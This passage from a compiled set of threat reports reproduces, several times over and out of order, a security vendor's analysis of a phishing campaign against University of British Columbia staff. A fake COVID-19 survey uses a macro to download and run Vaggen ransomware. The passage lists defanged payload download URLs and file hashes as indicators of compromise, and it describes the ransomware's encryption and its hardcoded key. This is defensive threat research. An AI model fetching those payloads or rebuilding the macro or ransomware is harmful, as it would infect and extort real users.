this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1700 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1701 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1702 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1703 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1704 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1705 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1706 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1707 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1708 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1709 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1710 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1711 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1712 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1713 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1714 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions 
belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1715 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1716 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1717 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1718 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. 
Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1719 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1720 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1721 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1722 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. 
In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1723 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1724 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1725 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1726 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1727 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1728 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1729 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1730 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1731 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1732 
